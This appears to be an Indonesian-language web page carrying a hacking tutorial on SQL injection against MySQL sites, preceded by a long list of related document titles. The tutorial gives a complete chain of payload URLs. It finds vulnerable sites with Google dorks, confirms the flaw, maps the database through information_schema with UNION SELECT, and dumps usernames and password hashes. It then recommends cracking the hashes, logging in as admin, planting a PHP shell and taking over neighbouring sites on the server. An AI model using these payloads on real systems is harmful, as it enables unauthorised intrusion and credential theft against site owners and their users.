Hacking Website With SQL Injection

dokumen-dokumen yang mirip
BAB 1 PENDAHULUAN. berkomunikasi. Hal tersebut dapat dilakukan dengan hanya mengetik alamat ip address

TUTORIAL SQL INJECTION

TUGAS KELOMPOK SECURITY COMPUTER TOOL HACKING SQL INJECTION

rancang bangun aplikasi web vulnerability scanner terhadap kelemahan sql injection dan xss menggunakan java

Secara umum, eksploit dapat dibagi atas dua jenis, yaitu eksploit lokal (local exploit), dan eksploit remote (remote exploit).

BAB 4 IMPLEMENTASI DAN EVALUASI

Xcode Intensif Training. Advanced ethical web. hacking & security

Xcode Intensif Training. Ethical Web hacking & Security ~ Advanced

Methods of Manual Penetration Testing (Actual Exploit)

Step by Step SQL Injection Attack

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

Keamanan Data di dalam Cloud Storage

*HACKING* Sekilas Tentang Google

KEAMANAN KOMPUTER APLIKASI HAVIJ KELOMPOK : BAGUS WAHYU SANTOSO KHAIRUL RAHMAN RENDY ZULIANSYAH

Analisis Penanganan SQL Injection pada Basis Data MySQL dengan Framework Code Igniter dan PHP

PROTECTING WEBSITES FROM COMMON ATTACKS

BAB IV HASIL DAN PEMBAHASAN

Pencari Celah Keamanan pada Aplikasi Web

MODUL 5 GET & POST Pemograman Web Teknik Informatika Universitas Pasundan Bandung 2016/2017

BAB IV IMPLEMENTASI DAN PENGUJIAN. selanjutnya yaitu tahap implementasi. Pada bab ini akan dibahas mengenai

Artikel ini akan memberikan informasi bagi pembaca yang kesulitan dengan Teknik Mencegah SQL Injection pada PHP.

BAB I PERSYARATAN PRODUK

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN

BAB IV IMPLEMENTASI DAN PENGUJIAN

Andi Dwi Riyanto, M.Kom

Langkah-langkah pembuatan website dengan Instalasi secara online

Keamanan Web Server. Pertemuan XI WEB HACKING

Modul Pengguna SCeLE

1. Tampilan instalasi Joomla awal. Klik Next. 2. Kemudian menuju langkah ke dua. Klik Next lagi.

BAB IV IMPLEMENTASI DAN UJI COBA SISTEM. Aplikasi Sistem Penerimaan Karyawan dibuat berbasis web dengan

2.4 Proses Upload File dan Database di Free Hosting Membuat Account di Free Hosting

BAB V IMPLEMENTASI DAN PENGUJIAN

TUGAS KEAMANAN JARINNGAN KOMPUTER

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN. dalam bentuk website maupun dalam bentuk aplikasi android pada sisi klien.

Website E-commerce Penjualan Barang Elektronik Menggunakan PHP dan MySQL

AWAS VIRUS LEWAT !!!

BAB IV HASIL DAN UJI COBA

Modul-5 GET & POST. Pemograman Web TEKNIK INFORMATIKA UNIVERSITAS PASUNDAN BANDUNG

BAB IV HASIL DAN UJI COBA

BAB III ANALISIS DAN PERANCANGAN

BAB IV IMPLEMENTASI DAN UJI COBA SISTEM. antarmuka dan GUI, digunakan aplikasi Macromedia Dreamweaver 8.0

BAB IV HASIL DAN PEMBAHASAN

Langkah-langkah Pembuatan Web dengan Joomla

APLIKASI AKUNTANSI MASJID BERBASIS WEB PORTAL

Bab 4 Hasil dan Pembahasan

BAB IV IMPLEMENTASI DAN PENGUJIAN

ADITYA WARDANA

Gambar 6.1 Tampilan Utama Website

BAB IV HASIL DAN PEMBAHASAN

IMPLEMENTASI KEAMANAN APLIKASI WEB DENGAN WEB APPLICATION FIREWALL

BAB IV HASIL DAN PEMBAHASAN

APLIKASI WEB VULNERABILITY SCANNER UNTUK SERANGAN SQL INJECTION MEMANFAATKAN GOOGLE DORK INURL TUGAS AKHIR. Oleh : MASYITHA

Step-Step dalam pembuatan Web

SMART LOGIN PADASITUSWEB MENGGUNAKANQR-CODE. Masdito Bachtiar Pembimbing 1 : Ary Mazharuddin S., S.Kom., M.Comp.Sc

BAB IV IMPLEMENTASI DAN EVALUASI

BAB IV HASIL DAN UJI COBA

KINERJA APLIKASI CLIENT SERVER UNTUK SISTEM INFORMASI TUMBUH KEMBANG BALITA

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN

WAP (3) Muhammad Zen S. Hadi, ST. MSc. WAP - The Wireless Application Protocol

BAB III PERANCANGAN SISTEM

BAB V IMPLEMENTASI DAN PENGUJIAN. Perangkat lunak yang digunakan untuk pembuatan website sekolah ini yaitu

PENGEMBANGAN WEBSITE bpmpt.karawangkab.go.id pada BPMPT KABUPATEN KARAWANG Tahun Anggaran 2016

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV HASIL DAN UJI COBA. Berikut ini dijelaskan tentang tampilan hasil dari Sistem Informasi

BAB IV HASIL DAN UJI COBA

BAB IV HASIL DAN UJI COBA

E-trik Ajax. Database MySQL. Dedi Alnas

MySQL J A M K E T I G A

Membuat Alamat

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN

Bab 4. Hasil dan Pembahasan

Membuat Aplikasi Tampil, Entri, Edit, Delete Mahasiswa

PROSEDUR MENJALANKAN APLIKASI PENCARI LAWAN TANDING FUTSAL BERBASIS WEB WILAYAH DKI JAKARTA PROSEDUR MENJALANKAN APLIKASI SECARA MANUAL

Wordpress : Membuat Situs di PC Sendiri

1. Pastikan Komputer terinstall MySQL dan PHP atau boleh juga XAMPP minimal. 2. Buka browser masuk ke localhost lalu ke phpmyadmin(untuk penggunaa

BAB IV HASIL DAN UJI COBA

BAB IV IMPLEMENTASI DAN PENGUJIAN SISTEM. Tahap perancangan dalam pembuatan program merupakan suatu hal yang

Nama : FEPILIANA Nim : TUGAS 05 KEAMANAN JARINGAN KOMPUTER ACTUAL EXPLOIT

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV IMPLEMENTASI DAN EVALUASI. Berikut ini adalah daftar spesifikasi perangkat lunak yang

Panduan Instalasi Joomla

WEB SERVER DAN E-COMMERCE

BAB IV IMPLEMENTASI DAN PENGUJIAN

BAB IV HASIL DAN UJI COBA

BUKU PANDUAN APLIKASI PELAPORAN DATA

BAB IV HASIL DAN UJI COBA

Jurnal Ilmiah Komputer dan Informatika (KOMPUTA) 45 Edisi... Volume..., Bulan 20.. ISSN :

Latihan Query mysql PHP QUERY

BAB IV IMPLEMENTASI DAN PENGUJIAN. Setelah melakukan tahap analisis dan perancangan sistem selesai di

Langkah Langkah Membuat Blog Secara Offline Menggunakan Wordpress

BAB V IMPLEMENTASI DAN PEMBAHASAN. Berikut ini adalah hardware dan software yang dibutuhkan untuk

Transkripsi:

Pengertian SQL INJECTION : Hacking Website With SQL Injection Penulis : kahfiehudson SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. Yang perlu di ketahui sebelum sql injection pada mysql : karakter: ' atau comments: /* atau information_schema untuk versi: mysql versi 5.x ( tidak support untuk mysql versi 4.x ) 1. Cari Target + Bugnya Cara mencarinya adalah dengan dork sql injection. Misalnya inurl: index.php?id= search dengan om GOOGLE, misalkan kita mendapatkan alamat situs http://www.target.com/index.php?id=4 Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi http://www.target.com/index.php?id=4 lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1-- 1

Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true. http://www.target.com/index.php?id=4+and+1=1-- Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut 99.9% memiliki bug SQL Injection http://www.target.com/index.php?id=4+and+1=2-- 2. Cari Column Yang Memiliki Celah Injection Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut. http://www.target.com/index.php?id=4+order+by+1-- http://www.target.com/index.php?id=4+order+by+2-- http://www.target.com/index.php?id=4+order+by+3-- http://www.target.com/index.php?id=4+order+by+4-- http://www.target.com/index.php?id=4+order+by+5-- url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6-- apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja. 3. Gunakan Perintah Union Select Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi : 2

http://www.target.com/index.php?id=4+union+select+1,2,3,4,5-- Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database. http://www.target.com/index.php?id=-4+union+select+1,2,3,4,5-- Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut. 4. Cari informasi Database Target Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi http://www.target.com/index.php?id=-4+union+select+1,database(),3,4,5-- Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi : http://www.target.com/index.php?id=-4+union+select+1,user(),version(),4,5-- Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha. Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu 3

colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya. http://www.target.com/index.php?id=4+union+select+1,concat(u ser(),0x3a,database()),version(),4,5-- 5. Dapatkan Nama Table Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema=database()+limit+0,1 -- Sehingga urlnya menjadi : http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5+from +information_schema.tables+where+table_schema=database()+limit+0,1-- Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_n ame),4,5+from+information_schema.tables+where+table_schema=database()-- Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik :P yuk kita lihat apa isinya. 6. Dapatkan Nama Column 4

table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_ name),4,5+from+information_schema.columns+where+table_name=0xhexa-- pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi : http://www.string-functions.com/string-hex.aspx Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_n ame),4,5+from+information_schema.columns+where+table_name=0x7461626c655 f75736572-- Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id. 7. Dapatkan Usename & Password Saya sudah mendapatkan nama table table_user yang berisi 2 buah column yaitu user_id dan password_id dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) dimasukkan setelah angka terakhir sehingga urlnya menjadi : http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0 x3a,password_id),4,5+from+table_user-- Tampillah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang 5

menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan? Referensi : Explore Your Brain, Indonesian Coder My Team : Bekasi Cyber Community, CyberForum-Online, Indonesian Hacker Team, Medan Hackers Thank s To : Bekasi Cyber Community, CyberForum-Online, Indonesian Hacker Team, Medan Hackers, Palembang Hacker Link, Muslim Hackers, Soldier Of Allah, Codenesia, Xcode, Hacker Newbie, Forum Balikita, Devilzc0de, Jasakom, Yogya Carder Link, All Indonesian Hackers Forum, All Indonesian Defacer, and YOU. 6